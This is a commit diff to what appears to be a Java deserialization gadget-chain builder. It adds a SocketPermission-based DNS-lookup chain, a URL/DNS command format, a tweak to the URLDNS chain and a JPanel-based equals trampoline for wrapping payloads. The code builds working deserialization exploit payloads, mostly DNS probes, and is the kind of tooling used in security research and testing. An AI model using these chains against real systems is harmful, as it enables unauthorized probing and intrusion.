added Flash JDK gadget chains

brunok-cs · brunok-cs · commit 5e02c3323fb6 · 2025-10-20T11:43:23.000+02:00
diff --git a/gadgetbuilder-api/src/main/java/org/ses/gadgetbuilder/annotations/Authors.java b/gadgetbuilder-api/src/main/java/org/ses/gadgetbuilder/annotations/Authors.java
@@ -51,6 +51,7 @@
     String PYN3RD = "pyn3rd";
     String JWU = "junjieWu";
     String JARIJ = "jarij";
+    String YihengZhang = "yiheng_zhang";
 
     public static class Utils {
         public static String[] getAuthors(AnnotatedElement annotated) {
diff --git a/gadgetbuilder-api/src/main/java/org/ses/gadgetbuilder/chains/command/CommandFormat.java b/gadgetbuilder-api/src/main/java/org/ses/gadgetbuilder/chains/command/CommandFormat.java
@@ -24,6 +24,7 @@ static CommandFormat getCommandFormatFromImpact(String impact) {
             case Impact.SetProperty:
                 return new SetPropertyCommandFormat();
             case Impact.DNSLookup:
+                return new URLDNSCommandFormat();
             case Impact.SSRF:
                 return new URLCommandFormat();
             default:
diff --git a/gadgetbuilder-api/src/main/java/org/ses/gadgetbuilder/chains/command/URLDNSCommandFormat.java b/gadgetbuilder-api/src/main/java/org/ses/gadgetbuilder/chains/command/URLDNSCommandFormat.java
@@ -0,0 +1,16 @@
+package org.ses.gadgetbuilder.chains.command;
+
+import java.net.MalformedURLException;
+import java.net.URL;
+
+public class URLDNSCommandFormat implements  CommandFormat {
+    @Override
+    public String getCommandFormat() {
+        return "<valid_fqdn>, e.g. foo.com";
+    }
+
+    @Override
+    public boolean isValidCommandFormat(String command) {
+        return command.split("\\.").length > 1;
+    }
+}
diff --git a/gadgetbuilder-chains1/src/main/java/org/ses/gadgetbuilder/chains1/SocketPermissionDNS.java b/gadgetbuilder-chains1/src/main/java/org/ses/gadgetbuilder/chains1/SocketPermissionDNS.java
@@ -0,0 +1,42 @@
+package org.ses.gadgetbuilder.chains1;
+
+import org.ses.gadgetbuilder.annotations.Authors;
+import org.ses.gadgetbuilder.annotations.Dependencies;
+import org.ses.gadgetbuilder.annotations.Impact;
+import org.ses.gadgetbuilder.chains.main.GadgetChain;
+import org.ses.gadgetbuilder.chains.main.TrampolineConnector;
+import org.ses.gadgetbuilder.chains.trampolines.noparam.HashCodeTrampoline;
+import org.ses.gadgetbuilder.util.Reflections;
+
+import java.net.*;
+
+@Dependencies()
+@Authors({ Authors.YihengZhang })
+@Impact(Impact.DNSLookup)
+public class SocketPermissionDNS extends GadgetChain<HashCodeTrampoline> {
+
+    public SocketPermissionDNS(HashCodeTrampoline _trampoline) {
+        super(_trampoline);
+    }
+
+    @Override
+    protected TrampolineConnector createPayload(String command) throws Exception {
+        SocketPermission permission = new SocketPermission(command, "connect");
+        Reflections.setFieldValue(permission, "init_with_ip", true);
+        return new TrampolineConnector(permission);
+    }
+
+    @Override
+    protected void postProcessPayload() throws Exception {
+
+    }
+
+    @Override
+    protected String getStackTrace() {
+        return  " <java.net.SocketPermission: int hashCode()>\n" +
+                " <java.net.SocketPermission: void getCanonName()>\n" +
+                " <java.net.SocketPermission: void getIP()>\n" +
+                " <java.net.InetAddress: java.net.InetAddress[] getAllByName0(java.lang.String,boolean)>\n" +
+                " <java.net.InetAddress: java.net.InetAddress[] getAllByName0(java.lang.String,java.net.InetAddress,boolean)>";
+    }
+}
diff --git a/gadgetbuilder-chains1/src/main/java/org/ses/gadgetbuilder/chains1/URLDNS.java b/gadgetbuilder-chains1/src/main/java/org/ses/gadgetbuilder/chains1/URLDNS.java
@@ -27,6 +27,8 @@ public URLDNS(HashCodeTrampoline _trampoline) {
 
     @Override
     protected TrampolineConnector createPayload(String command) throws Exception {
+        command = "http://" + command + ":8000";
+
         URLStreamHandler handler = new SilentURLStreamHandler();
         this.url = new URL(null, command, handler);
 
diff --git a/gadgetbuilder-impl/src/main/java/org/ses/gadgetbuilder/impl/trampolines/equals/JComponentEquals.java b/gadgetbuilder-impl/src/main/java/org/ses/gadgetbuilder/impl/trampolines/equals/JComponentEquals.java
@@ -0,0 +1,26 @@
+package org.ses.gadgetbuilder.impl.trampolines.equals;
+
+import org.ses.gadgetbuilder.annotations.Authors;
+import org.ses.gadgetbuilder.chains.trampolines.singleparam.EqualsTrampoline;
+import org.ses.gadgetbuilder.util.Reflections;
+
+import javax.swing.*;
+
+@Authors(Authors.YihengZhang)
+public class JComponentEquals implements EqualsTrampoline {
+
+
+    @Override
+    public Object wrapPayload(Object payload, Object param) throws Exception {
+
+        JPanel j = new JPanel();
+        Class atClass = Class.forName("javax.swing.ArrayTable");
+        Object arrayTable = Reflections.createWithoutConstructor(atClass);
+        Object[] table = new Object[]{payload, "1", param, "2"};
+
+        Reflections.setFieldValue(arrayTable, "table", table);
+        Reflections.setFieldValue(j, "clientProperties", arrayTable);
+
+        return j;
+    }
+}
